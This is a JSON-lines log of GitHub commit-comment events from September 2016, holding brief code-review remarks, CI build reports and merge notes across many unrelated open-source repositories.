{"id":"4617845940","type":"CommitCommentEvent","actor":{"login":"cristina-david"},"repo":{"name":"smowton/cbmc"},"payload":{"comment":{"id":19172629,"position":41,"line":229,"path":"src/java_bytecode/java_entry_point.cpp","commit_id":"5442f51e14a92c93b9a1282a687b3c432ee4144f","created_at":"2016-09-26T13:42:06Z","updated_at":"2016-09-26T13:42:06Z","body":"Could you please refactor this such that each disjunct/conjunct it's a method with a self explanatory name? Otherwise, the specific numbers are hard to understand."}},"created_at":"2016-09-26T13:42:06Z"}
{"id":"4617846295","type":"CommitCommentEvent","actor":{"login":"KevinW1998"},"repo":{"name":"WohlSoft/PGE-Project"},"payload":{"comment":{"id":19172631,"position":8,"line":113,"path":"Engine/scenes/scene.h","commit_id":"afa50516b83f2b26541f6193bf8e0719fbc78e3b","created_at":"2016-09-26T13:42:09Z","updated_at":"2016-09-26T13:42:09Z","body":"Although it is possible to have a callback function, you might want to consider using pure virtual base class + subclasses instead. Especially when you have multiple functions for renderning (i.e. onDrawStart, onRender, onDrawEnd). It dependes on the complexity."}},"created_at":"2016-09-26T13:42:09Z"}
{"id":"4617851475","type":"CommitCommentEvent","actor":{"login":"damiansb"},"repo":{"name":"damiansb/dbo"},"payload":{"comment":{"id":19172641,"position":null,"line":null,"path":null,"commit_id":"7d57ab842363906a50ee67d7c967752399084ac9","created_at":"2016-09-26T13:43:03Z","updated_at":"2016-09-26T13:43:03Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Alterações no DBO](https://trello.com/c/RztpsJSm/66-alteracoes-no-dbo)"}},"created_at":"2016-09-26T13:43:03Z"}
{"id":"4617854490","type":"CommitCommentEvent","actor":{"login":"MosheMaorKaltura"},"repo":{"name":"kaltura/server"},"payload":{"comment":{"id":19172648,"position":8,"line":8,"path":"alpha/lib/model/kStreamContainer.php","commit_id":"e6116b02d3832fa43b139b7b916c188cda26334a","created_at":"2016-09-26T13:43:32Z","updated_at":"2016-09-26T13:43:32Z","body":"Create enum type"}},"created_at":"2016-09-26T13:43:32Z"}
{"id":"4617859083","type":"CommitCommentEvent","actor":{"login":"danield137"},"repo":{"name":"django/django"},"payload":{"comment":{"id":19172657,"position":35,"line":34,"path":"django/core/paginator.py","commit_id":"d67208f5bea85d731c8171070381cd80173dffd4","created_at":"2016-09-26T13:44:18Z","updated_at":"2016-09-26T13:44:18Z","body":"limiting here seems to cause an extra query with LIMIT clause even if `top + self.orphans >= self.count`.\r\nthe if should probably just return the entire objecT_list"}},"created_at":"2016-09-26T13:44:18Z"}
{"id":"4617864653","type":"CommitCommentEvent","actor":{"login":"kkotlarski"},"repo":{"name":"erikras/redux-form"},"payload":{"comment":{"id":19172670,"position":null,"line":null,"path":null,"commit_id":"c1083f9236c9814a093741519764becd17878c7d","created_at":"2016-09-26T13:45:15Z","updated_at":"2016-09-26T13:45:15Z","body":"Hi\r\nWhat React feature is required here?"}},"created_at":"2016-09-26T13:45:15Z"}
{"id":"4617864863","type":"CommitCommentEvent","actor":{"login":"garyp75"},"repo":{"name":"garyp75/wptoolkit"},"payload":{"comment":{"id":19172671,"position":null,"line":null,"path":null,"commit_id":"cd9997d50aad3df559a4f18c8b8e6ce693246f2d","created_at":"2016-09-26T13:45:17Z","updated_at":"2016-09-26T13:45:17Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [adjust CSS on themes listing page in plugin](https://trello.com/c/9kksq8Cf/69-adjust-css-on-themes-listing-page-in-plugin)"}},"created_at":"2016-09-26T13:45:17Z"}
{"id":"4617867426","type":"CommitCommentEvent","actor":{"login":"TaygunBoran"},"repo":{"name":"FAS16/Terning"},"payload":{"comment":{"id":19172674,"position":null,"line":null,"path":null,"commit_id":"47cd8724ba695a967787fbaca54da60cc039d272","created_at":"2016-09-26T13:45:39Z","updated_at":"2016-09-26T13:45:39Z","body":"Fejlen er at den slår en gang mindre end det ønskede. F.eks. hvis man indtaster 5 slag, slår den kun 4 gange. Denne fejl rettes ved at indtaste et = tegn efter < tegnet i linje 14. Så den går fra i<n til i<=n"}},"created_at":"2016-09-26T13:45:39Z"}
{"id":"4617868244","type":"CommitCommentEvent","actor":{"login":"annulen"},"repo":{"name":"annulen/webkit"},"payload":{"comment":{"id":19172675,"position":5,"line":19,"path":"Source/cmake/OptionsCommon.cmake","commit_id":"e60cf699beb095879ab07d1e35ea9e47ea1e833a","created_at":"2016-09-26T13:45:46Z","updated_at":"2016-09-26T13:45:46Z","body":"Like `USE_LD_GOLD`"}},"created_at":"2016-09-26T13:45:46Z"}
{"id":"4617873198","type":"CommitCommentEvent","actor":{"login":"joachifm"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19172686,"position":null,"line":null,"path":null,"commit_id":"2d0c1c6a7c329c8ba381430df3ba1f6bafd74424","created_at":"2016-09-26T13:46:35Z","updated_at":"2016-09-26T13:46:35Z","body":"@globin cool. Do you know if this actually works on the stock grsec kernel?"}},"created_at":"2016-09-26T13:46:35Z"}
{"id":"4617877074","type":"CommitCommentEvent","actor":{"login":"OutdatedVersion"},"repo":{"name":"OutdatedVersion/ckamps-hub-protect"},"payload":{"comment":{"id":19172690,"position":null,"line":null,"path":null,"commit_id":"316e14266ab7fa35ecc4eae267665e0eea65966d","created_at":"2016-09-26T13:47:13Z","updated_at":"2016-09-26T13:47:13Z","body":"well gosh diddly darn I forgot to remove that one part"}},"created_at":"2016-09-26T13:47:13Z"}
{"id":"4617882796","type":"CommitCommentEvent","actor":{"login":"alexplusde"},"repo":{"name":"tyrant88/search_it"},"payload":{"comment":{"id":19172703,"position":null,"line":null,"path":null,"commit_id":"97d758f6ee1884f3ad9257f436864db92f2d9ef3","created_at":"2016-09-26T13:48:13Z","updated_at":"2016-09-26T13:48:13Z","body":"Dann können die beiden Plugins jetzt auch aus dem Repo entfernt werden, oder?"}},"created_at":"2016-09-26T13:48:13Z"}
{"id":"4617889031","type":"CommitCommentEvent","actor":{"login":"KevinW1998"},"repo":{"name":"WohlSoft/PGE-Project"},"payload":{"comment":{"id":19172717,"position":37,"line":549,"path":"Engine/scenes/scene_level.cpp","commit_id":"afa50516b83f2b26541f6193bf8e0719fbc78e3b","created_at":"2016-09-26T13:49:17Z","updated_at":"2016-09-26T13:49:17Z","body":"Okay, your rendering logic is very weird and overcomplicated.\r\nSo I would suggest doing it like LunaLua does:\r\n1. Get the vector of rendering targets\r\n2. Use std::stable_sort + Precondition lambda (incredible fast)\r\n3. For-each through all sorted rendering targets\r\n\r\n--> Fast, easier, small code!"}},"created_at":"2016-09-26T13:49:17Z"}
{"id":"4617889703","type":"CommitCommentEvent","actor":{"login":"manucorporat"},"repo":{"name":"driftyco/ionic"},"payload":{"comment":{"id":19172720,"position":null,"line":null,"path":null,"commit_id":"75d552690b4a640f3b7213846fcbcbb4e48c2118","created_at":"2016-09-26T13:49:24Z","updated_at":"2016-09-26T13:49:24Z","body":"@ramonornela I agree, but `ion-fixed` received important improvements that makes it difficult to provide a back-compatible solution: https://github.com/driftyco/ionic/pull/8103/commits/a98e209f65d13b79701df6286fdcdb3c14b9f44a\r\n\r\n```\r\n<ion-fixed> --> <div ion-fixed>\r\n```\r\n(div or any element)"}},"created_at":"2016-09-26T13:49:24Z"}
{"id":"4617892599","type":"CommitCommentEvent","actor":{"login":"joachifm"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19172726,"position":null,"line":null,"path":null,"commit_id":"2d0c1c6a7c329c8ba381430df3ba1f6bafd74424","created_at":"2016-09-26T13:49:55Z","updated_at":"2016-09-26T13:49:55Z","body":"Ah, never mind, just saw the IRC log."}},"created_at":"2016-09-26T13:49:55Z"}
{"id":"4617892989","type":"CommitCommentEvent","actor":{"login":"knownasilya"},"repo":{"name":"knownasilya/ember-cli-deploy-gcloud-storage"},"payload":{"comment":{"id":19172728,"position":null,"line":null,"path":null,"commit_id":"e69439bcf1228904e9429e6b91d34597240b0c09","created_at":"2016-09-26T13:49:59Z","updated_at":"2016-09-26T13:49:59Z","body":"Sure"}},"created_at":"2016-09-26T13:49:59Z"}
{"id":"4617894952","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19172734,"position":null,"line":null,"path":null,"commit_id":"3e0522667448484a65559c91f00245763dd2a57c","created_at":"2016-09-26T13:50:19Z","updated_at":"2016-09-26T13:50:19Z","body":"ASIHP-validation1 (shenb) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2359 of 2373 tests passed, 559 test warnings)\n\n * 573 tests had: AUD diffs.\n * 17 tests had: EIO diffs.\n * 7 tests had: ESO small diffs.\n * 10 tests had: ESO big diffs.\n * 4 tests had: MTR big diffs.\n * 12 tests had: Table big diffs.\n * 2 tests had: ERR diffs.\n * 15 tests had: RDD diffs.\n * 1 test had: MTD diffs.\n * 18 tests had: Table small diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ small diffs.\n * 2 tests had: MTR small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3e0522667448484a65559c91f00245763dd2a57c-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3e0522667448484a65559c91f00245763dd2a57c-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.41%25-yellow.svg)</a> \n"}},"created_at":"2016-09-26T13:50:19Z"}
{"id":"4617902025","type":"CommitCommentEvent","actor":{"login":"fashioncj"},"repo":{"name":"CyanogenMod/android_device_motorola_thea"},"payload":{"comment":{"id":19172744,"position":null,"line":null,"path":null,"commit_id":"74a0e4b901ad09c516df951ccf6b2ea278c7ae08","created_at":"2016-09-26T13:51:32Z","updated_at":"2016-09-26T13:51:32Z","body":"@luk1337  20160926 no fix"}},"created_at":"2016-09-26T13:51:32Z"}
{"id":"4617903283","type":"CommitCommentEvent","actor":{"login":"hristomarinov"},"repo":{"name":"hristomarinov/TasksDemo4"},"payload":{"comment":{"id":19172749,"position":null,"line":null,"path":null,"commit_id":"c5514ca232935ff17f7f56eb7e785af762e789d8","created_at":"2016-09-26T13:51:44Z","updated_at":"2016-09-26T13:51:44Z","body":"TaskOne"}},"created_at":"2016-09-26T13:51:44Z"}
{"id":"4617905262","type":"CommitCommentEvent","actor":{"login":"Wohlstand"},"repo":{"name":"WohlSoft/PGE-Project"},"payload":{"comment":{"id":19172752,"position":37,"line":549,"path":"Engine/scenes/scene_level.cpp","commit_id":"afa50516b83f2b26541f6193bf8e0719fbc78e3b","created_at":"2016-09-26T13:52:02Z","updated_at":"2016-09-26T13:52:02Z","body":"1. Already vector\r\n2. std::stable_sort already applying to the \"luaRenders\" array\r\n3. camera's array is hand-made, and it has been designed to \"add when catched by camera\" and \"remove when doesn't toches camera\". That made to less lag when on screen is over 5000 elements"}},"created_at":"2016-09-26T13:52:02Z"}
{"id":"4617906831","type":"CommitCommentEvent","actor":{"login":"saracarl"},"repo":{"name":"benwbrum/fromthepage"},"payload":{"comment":{"id":19172755,"position":5,"line":57,"path":"app/controllers/collection_controller.rb","commit_id":"983a23acd4e3f700a1b0dac14a8522e383285ce2","created_at":"2016-09-26T13:52:15Z","updated_at":"2016-09-26T13:52:15Z","body":"@benwbrum can you do a final review of this?\n\nOn Mon, Sep 26, 2016 at 7:34 AM, tbl73 <notifications@github.com> wrote:\n\n> Okay, I'll check that out.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/benwbrum/fromthepage/commit/983a23acd4e3f700a1b0dac14a8522e383285ce2#commitcomment-19171529>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AArP1hVXl8RccKt-PD-Hha7CQK92sODxks5qt7vugaJpZM4KFqF0>\n> .\n>\n"}},"created_at":"2016-09-26T13:52:15Z"}
{"id":"4617909273","type":"CommitCommentEvent","actor":{"login":"olivierchatry"},"repo":{"name":"knownasilya/ember-cli-deploy-gcloud-storage"},"payload":{"comment":{"id":19172761,"position":null,"line":null,"path":null,"commit_id":"e69439bcf1228904e9429e6b91d34597240b0c09","created_at":"2016-09-26T13:52:34Z","updated_at":"2016-09-26T13:52:34Z","body":"Done, https://github.com/knownasilya/ember-cli-deploy-gcloud-storage/pull/4"}},"created_at":"2016-09-26T13:52:34Z"}
{"id":"4617910913","type":"CommitCommentEvent","actor":{"login":"kennethjiang"},"repo":{"name":"kennethjiang/OctoPrint-Slicer"},"payload":{"comment":{"id":19172767,"position":4,"line":14,"path":"setup.py","commit_id":"610558d87015ace1c45076192457df909f330b8f","created_at":"2016-09-26T13:52:49Z","updated_at":"2016-09-26T13:52:49Z","body":"thank you for pointing this out! fixed it in 0.4.0."}},"created_at":"2016-09-26T13:52:49Z"}
{"id":"4617912433","type":"CommitCommentEvent","actor":{"login":"knownasilya"},"repo":{"name":"knownasilya/ember-cli-deploy-gcloud-storage"},"payload":{"comment":{"id":19172770,"position":null,"line":null,"path":null,"commit_id":"e69439bcf1228904e9429e6b91d34597240b0c09","created_at":"2016-09-26T13:53:04Z","updated_at":"2016-09-26T13:53:04Z","body":"Merged"}},"created_at":"2016-09-26T13:53:04Z"}
{"id":"4617917200","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19172782,"position":null,"line":null,"path":null,"commit_id":"3e0522667448484a65559c91f00245763dd2a57c","created_at":"2016-09-26T13:53:50Z","updated_at":"2016-09-26T13:53:50Z","body":"ASIHP-validation1 (shenb) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3e0522667448484a65559c91f00245763dd2a57c-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-26T13:53:50Z"}
{"id":"4617918277","type":"CommitCommentEvent","actor":{"login":"cristina-david"},"repo":{"name":"cristina-david/cbmc"},"payload":{"comment":{"id":19172787,"position":52,"line":167,"path":"src/cbmc/bmc_cover.cpp","commit_id":"04f511ffdcd53ac094179bdb2580ecf9cf4c91b6","created_at":"2016-09-26T13:54:01Z","updated_at":"2016-09-26T13:54:01Z","body":"On second thought, it's not guaranteed that these are sorted so I'm changing the code to not use this assumption."}},"created_at":"2016-09-26T13:54:01Z"}
{"id":"4617921461","type":"CommitCommentEvent","actor":{"login":"zhangjingye03"},"repo":{"name":"AisonSu/AutoGetZhixinElectiveCourse"},"payload":{"comment":{"id":19172798,"position":41,"line":28,"path":"README.md","commit_id":"7ea7a986d5bcb1a75166682697151a1b21b833ae","created_at":"2016-09-26T13:54:33Z","updated_at":"2016-09-26T13:54:33Z","body":"就凭这点，我觉得抢课还是做成firefox/chrome插件比较棒 😃 登录态不需要重新获取，而且取学期id和课程id会比较方便"}},"created_at":"2016-09-26T13:54:33Z"}
{"id":"4617922794","type":"CommitCommentEvent","actor":{"login":"squalvj"},"repo":{"name":"squalvj/belajargit"},"payload":{"comment":{"id":19172804,"position":5,"line":5,"path":"tai.html","commit_id":"a86742ddac9507062039a678f2a85bc2a1b44bf3","created_at":"2016-09-26T13:54:45Z","updated_at":"2016-09-26T13:54:45Z","body":"hfgdfgdfg"}},"created_at":"2016-09-26T13:54:45Z"}
{"id":"4617923915","type":"CommitCommentEvent","actor":{"login":"squalvj"},"repo":{"name":"squalvj/belajargit"},"payload":{"comment":{"id":19172805,"position":2,"line":2,"path":"wew/wow.html","commit_id":"a86742ddac9507062039a678f2a85bc2a1b44bf3","created_at":"2016-09-26T13:54:56Z","updated_at":"2016-09-26T13:54:56Z","body":"aku ganteng"}},"created_at":"2016-09-26T13:54:56Z"}
{"id":"4617924159","type":"CommitCommentEvent","actor":{"login":"marine1988"},"repo":{"name":"Jonybat/flexget_config"},"payload":{"comment":{"id":19172806,"position":null,"line":null,"path":null,"commit_id":"2af2d7487e7ad6ad90632330908f2f5cdceb27f8","created_at":"2016-09-26T13:54:58Z","updated_at":"2016-09-26T13:54:58Z","body":"I do that thank you i will give you some feedback!"}},"created_at":"2016-09-26T13:54:58Z"}
{"id":"4617925352","type":"CommitCommentEvent","actor":{"login":"bjfish"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19172810,"position":4,"line":63,"path":"truffle/src/main/java/org/jruby/truffle/language/globals/GlobalVariables.java","commit_id":"f85827b3f03b5a765435e237a79eef1e2531accb","created_at":"2016-09-26T13:55:11Z","updated_at":"2016-09-26T13:55:11Z","body":"Renamed this at: 477bcf3dc5ead6aeaccf2a3c6e51f83561a4ad2a"}},"created_at":"2016-09-26T13:55:11Z"}
{"id":"4617925837","type":"CommitCommentEvent","actor":{"login":"akoeplinger"},"repo":{"name":"mono/mono"},"payload":{"comment":{"id":19172812,"position":null,"line":null,"path":null,"commit_id":"7fd68f813d39909690a63ca81a676331fc8adca9","created_at":"2016-09-26T13:55:15Z","updated_at":"2016-09-26T13:55:15Z","body":"@ajlennon you could disable the Mono build on your AppVeyor account now if you want 😄 "}},"created_at":"2016-09-26T13:55:15Z"}
{"id":"4617936441","type":"CommitCommentEvent","actor":{"login":"marcoagpinto"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":19172831,"position":null,"line":null,"path":null,"commit_id":"789fdaf49f970e33a7b95560f703b6204298303f","created_at":"2016-09-26T13:56:53Z","updated_at":"2016-09-26T13:56:53Z","body":"@danielnaber \r\nIt is normal that more words are recognised as valid, since this GB speller has around 25K new words.\r\n\r\nTomorrow or on Wednesday I will release V2.41 for Mozilla which will have 600+ new words.\r\n\r\nEvery month I add around 600-700 new words thanks to my Oxford Gold Account that gives me full access to all examples in their site.\r\n\r\nI will attempt to code in Proofing Tool GUI software in 2017 the ability of converting dictionaries into morphologic, provided the .DIC has the extra field... in simple words, my goal is to grab the pt_PT spellers (both pre + post language agreement and merge them into a morphologic one... also, in 2017 I want to create a LanguageTool rules creator into it and I have already drawn the GUI on paper."}},"created_at":"2016-09-26T13:56:53Z"}
{"id":"4617942711","type":"CommitCommentEvent","actor":{"login":"bartromgens"},"repo":{"name":"ucyo/geojsoncontour"},"payload":{"comment":{"id":19172842,"position":null,"line":null,"path":null,"commit_id":"5b1e8fb3b9255908a753f0253f35b4d7191f53df","created_at":"2016-09-26T13:57:56Z","updated_at":"2016-09-26T13:57:56Z","body":"Hi @ucyo,\r\n\r\nI just noticed your great work on geojsoncontour. Glad to see someone has a use for it! \r\n\r\nI would like to merge your work and release a new version. You think that's ok?"}},"created_at":"2016-09-26T13:57:56Z"}
{"id":"4617945388","type":"CommitCommentEvent","actor":{"login":"pennam"},"repo":{"name":"ThrowTheSwitch/Ceedling"},"payload":{"comment":{"id":19172844,"position":null,"line":null,"path":null,"commit_id":"61b3db601b8caf4e36145638a811e9f856cf6c76","created_at":"2016-09-26T13:58:22Z","updated_at":"2016-09-26T13:58:22Z","body":"any additional information on how to configure gcovr to produce html reports ? I've adeed gcovr in my env path (windows) but i cannot see any html output? how can i debug it?"}},"created_at":"2016-09-26T13:58:22Z"}
{"id":"4617950243","type":"CommitCommentEvent","actor":{"login":"ncuillery"},"repo":{"name":"ncuillery/react-native"},"payload":{"comment":{"id":19172850,"position":18,"line":18,"path":"local-cli/upgrade/upgrade.js","commit_id":"838b6c8121e15e29fe0f03cda6410933c35e1d7a","created_at":"2016-09-26T13:59:12Z","updated_at":"2016-09-26T13:59:12Z","body":"The new process uses the old process under the hood. We still have to produce files that are adapted to the user context (name of his app) in order to generate a suitable git patch afterwards.\r\n\r\nIMO, the future of Yeoman usage is unrelated to this feature. We can switch to an other way to generate these files at any time. WYT ?"}},"created_at":"2016-09-26T13:59:12Z"}
{"id":"4617950480","type":"CommitCommentEvent","actor":{"login":"dbrgn"},"repo":{"name":"saltyrtc/saltyrtc-meta"},"payload":{"comment":{"id":19172852,"position":null,"line":null,"path":null,"commit_id":"80641d85b463f3437fd396a08cb52e8486fddeb7","created_at":"2016-09-26T13:59:14Z","updated_at":"2016-09-26T13:59:14Z","body":"Cool. But isn't there an arrow missing from the lower offer/answer/candidate to itself?"}},"created_at":"2016-09-26T13:59:14Z"}
{"id":"4617954262","type":"CommitCommentEvent","actor":{"login":"ophthal"},"repo":{"name":"ophthal/openEMR_2"},"payload":{"comment":{"id":19172864,"position":null,"line":null,"path":null,"commit_id":"f6829d1bcf24e22307bd9e3966ddce95c440d549","created_at":"2016-09-26T13:59:51Z","updated_at":"2016-09-26T13:59:51Z","body":"Hi Brady,\n\nThis branch current-work-15 is already a new branch created off of https://github.com/openemr/openemr.git <https://github.com/openemr/openemr.git> master \nupstream/master\n\nThe whitespace issues occur as I was reformatting the spaces in the code as I went through it - no biggie.\n\nI will make a new branch off this upstream/master for any bugs I run into that I can fix.  \nIf I can’t fix it,  I will post an issue in the github issue area.\n\nRay\n\n> On Sep 26, 2016, at 5:22 AM, Brady Miller <notifications@github.com <mailto:notifications@github.com>> wrote:\n> \n> ok. brought in your most recent changes.\n> \n> For your next work, make a new branch and begin working from the most recent official development master branch. Note I had to remove all the whitespace changes, which we can avoid if you begin working from the most recent master branch. This will also incorporate a recent change I made to your form while cleaning out the concurrent global from the codebase. Doing this will avoid reverting changes, such as this code, which I added back:\n> openemr/openemr@27a1419 <https://github.com/openemr/openemr/commit/27a1419014ae2373adf929a130c28b17bd0e64cc>\n> Most importantly, though, don't stop coding (ie. anything can be fixed).\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub <https://github.com/ophthal/openEMR_2/commit/f6829d1bcf24e22307bd9e3966ddce95c440d549#commitcomment-19169516>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AAfDcF8_9Le2JBJdtiyoYxXVcFQVHdl_ks5qt47IgaJpZM4KFf4W>.\n> \n\n"}},"created_at":"2016-09-26T13:59:51Z"}
{"id":"4617954382","type":"CommitCommentEvent","actor":{"login":"ikettu"},"repo":{"name":"ikettu/JukolaTest"},"payload":{"comment":{"id":19172865,"position":null,"line":null,"path":null,"commit_id":"9b7f5664b92324e7d5ed962257ea07b041811526","created_at":"2016-09-26T13:59:52Z","updated_at":"2016-09-26T13:59:52Z","body":"I think it's easiest I manually redo my changes which were overwritten by this merge."}},"created_at":"2016-09-26T13:59:52Z"}
{"id":"4617961111","type":"CommitCommentEvent","actor":{"login":"dignifiedquire"},"repo":{"name":"elixir-lang/ex_doc"},"payload":{"comment":{"id":19172874,"position":null,"line":null,"path":null,"commit_id":"b4f794c84ee2bbd1d5209b3268087d90d7afaca4","created_at":"2016-09-26T14:00:57Z","updated_at":"2016-09-26T14:00:57Z","body":"👍 "}},"created_at":"2016-09-26T14:00:57Z"}
{"id":"4617961462","type":"CommitCommentEvent","actor":{"login":"lucaspiller"},"repo":{"name":"ifad/eaco"},"payload":{"comment":{"id":19172875,"position":null,"line":null,"path":null,"commit_id":"64950b25cccee3a674b5af42af5a17871e801803","created_at":"2016-09-26T14:01:01Z","updated_at":"2016-09-26T14:01:01Z","body":"Yup, just seen and reverted. :("}},"created_at":"2016-09-26T14:01:01Z"}
{"id":"4617961579","type":"CommitCommentEvent","actor":{"login":"ajlennon"},"repo":{"name":"mono/mono"},"payload":{"comment":{"id":19172877,"position":null,"line":null,"path":null,"commit_id":"7fd68f813d39909690a63ca81a676331fc8adca9","created_at":"2016-09-26T14:01:02Z","updated_at":"2016-09-26T14:01:02Z","body":"Great news :) I'll add it to my todo list!"}},"created_at":"2016-09-26T14:01:02Z"}
{"id":"4617964524","type":"CommitCommentEvent","actor":{"login":"envomer"},"repo":{"name":"laravel/valet"},"payload":{"comment":{"id":19172891,"position":null,"line":null,"path":null,"commit_id":"8fc59dd74870db1a84375da8f128892ef55a575a","created_at":"2016-09-26T14:01:29Z","updated_at":"2016-09-26T14:01:29Z","body":"Passing addition parameters to ngrok is not working for me.\r\n\r\n```\r\nvalet share --region=eu\r\n```\r\nI am trying to pass the region (eu) but with no success. The region defaults to 'us'.\r\nCan you help me out here?"}},"created_at":"2016-09-26T14:01:29Z"}
{"id":"4617966958","type":"CommitCommentEvent","actor":{"login":"tyrant88"},"repo":{"name":"tyrant88/search_it"},"payload":{"comment":{"id":19172897,"position":null,"line":null,"path":null,"commit_id":"97d758f6ee1884f3ad9257f436864db92f2d9ef3","created_at":"2016-09-26T14:01:52Z","updated_at":"2016-09-26T14:01:52Z","body":"Ja, ich hatte sie schon raus, sind nur durch einen Fehler wieder drin…\n\nHeute Abend pushe ich die nächste Version, dann fliegen sie raus\n\n \n \nVon: Alexander Walther [mailto:notifications@github.com] \nGesendet: Montag, 26. September 2016 15:48\nAn: tyrant88/search_it\nBetreff: Re: [tyrant88/search_it] Plugin Search Highlighter und Reindex in das Addon eingebaut (97d758f)\n\n \nDann können die beiden Plugins jetzt auch aus dem Repo entfernt werden, oder?\n\n—\nYou are receiving this because you are subscribed to this thread.\nReply to this email directly, view it on GitHub, or mute the thread.\n\n"}},"created_at":"2016-09-26T14:01:52Z"}
{"id":"4617971752","type":"CommitCommentEvent","actor":{"login":"sarahgarlough"},"repo":{"name":"SYSC3303-Team4/Iteration1"},"payload":{"comment":{"id":19172912,"position":91,"line":91,"path":"src/TFTPClient.java","commit_id":"ec5523360e585d2869a24eec494a4fafb434e157","created_at":"2016-09-26T14:02:39Z","updated_at":"2016-09-26T14:02:39Z","body":"smelly"}},"created_at":"2016-09-26T14:02:39Z"}
{"id":"4617972182","type":"CommitCommentEvent","actor":{"login":"sompylasar"},"repo":{"name":"C5T/Current"},"payload":{"comment":{"id":19172913,"position":null,"line":null,"path":null,"commit_id":"1c5f05a42ea73cd0eb5a11195be7c720123d83ae","created_at":"2016-09-26T14:02:43Z","updated_at":"2016-09-26T14:02:43Z","body":":+1: "}},"created_at":"2016-09-26T14:02:43Z"}
{"id":"4617972502","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"AndrewSondey/relaxr-landing-page"},"payload":{"comment":{"id":19172914,"position":77,"line":77,"path":"css/style.css","commit_id":"2da4c13db57a5cfbe100d301d5665ad779512d55","created_at":"2016-09-26T14:02:46Z","updated_at":"2016-09-26T14:02:46Z","body":"Great use of absolute positioning and transform but it wasn't necessary this time around. :)"}},"created_at":"2016-09-26T14:02:46Z"}
{"id":"4617972665","type":"CommitCommentEvent","actor":{"login":"asmagill"},"repo":{"name":"Hammerspoon/hammerspoon"},"payload":{"comment":{"id":19172915,"position":null,"line":null,"path":null,"commit_id":"477770c43936857c383825652f78b8c711ddf66e","created_at":"2016-09-26T14:02:48Z","updated_at":"2016-09-26T14:02:48Z","body":"hmm... i remember changing the log messages, but not the return value... so I'm going to blame aliens since my name appears attached to it... \r\n\r\nmaybe it was an attempt to detect failed bindings immediately rather then churn along happily oblivious?  at any rate, I apparently didn't test it well enough."}},"created_at":"2016-09-26T14:02:48Z"}
{"id":"4617973045","type":"CommitCommentEvent","actor":{"login":"robUx4"},"repo":{"name":"robUx4/vlc"},"payload":{"comment":{"id":19172917,"position":null,"line":null,"path":null,"commit_id":"19914a8cd9276f57eee8f6fae0f624649187661c","created_at":"2016-09-26T14:02:52Z","updated_at":"2016-09-26T14:02:52Z","body":"It changes the logic in a different way, I prefer to keep a separate patch that may be reverted later"}},"created_at":"2016-09-26T14:02:52Z"}
{"id":"4617973402","type":"CommitCommentEvent","actor":{"login":"aaustin141"},"repo":{"name":"chebfun/chebfun"},"payload":{"comment":{"id":19172920,"position":null,"line":null,"path":null,"commit_id":"c17f07b5b47353f07df0d7c6f4562e19256556e2","created_at":"2016-09-26T14:02:55Z","updated_at":"2016-09-26T14:02:55Z","body":"Is there a reason this needs to be done inside chebfun itself?  I thought the main idea was going to be to let chebtech/trigtech handle all the stuff needed for operator broadcasting.  Are quasimatrices an issue here?"}},"created_at":"2016-09-26T14:02:55Z"}
{"id":"4617974129","type":"CommitCommentEvent","actor":{"login":"sompylasar"},"repo":{"name":"C5T/Current"},"payload":{"comment":{"id":19172922,"position":9,"line":114,"path":"Karl/integrations/nodejs/test.js","commit_id":"1c5f05a42ea73cd0eb5a11195be7c720123d83ae","created_at":"2016-09-26T14:03:03Z","updated_at":"2016-09-26T14:03:03Z","body":"useless wait loop"}},"created_at":"2016-09-26T14:03:03Z"}
{"id":"4617977075","type":"CommitCommentEvent","actor":{"login":"stnava"},"repo":{"name":"stnava/ANTsR"},"payload":{"comment":{"id":19172930,"position":null,"line":null,"path":null,"commit_id":"63db009342924b41f7b870f64133f2a753e330ce","created_at":"2016-09-26T14:03:30Z","updated_at":"2016-09-26T14:03:30Z","body":"@bkandel heads up that i am porting this to R"}},"created_at":"2016-09-26T14:03:30Z"}
{"id":"4617978390","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"AndrewSondey/relaxr-landing-page"},"payload":{"comment":{"id":19172933,"position":65,"line":65,"path":"css/style.css","commit_id":"2da4c13db57a5cfbe100d301d5665ad779512d55","created_at":"2016-09-26T14:03:42Z","updated_at":"2016-09-26T14:03:42Z","body":"You could've given this both buttons the same class and then just add a second class to target the second button and change its colors."}},"created_at":"2016-09-26T14:03:42Z"}
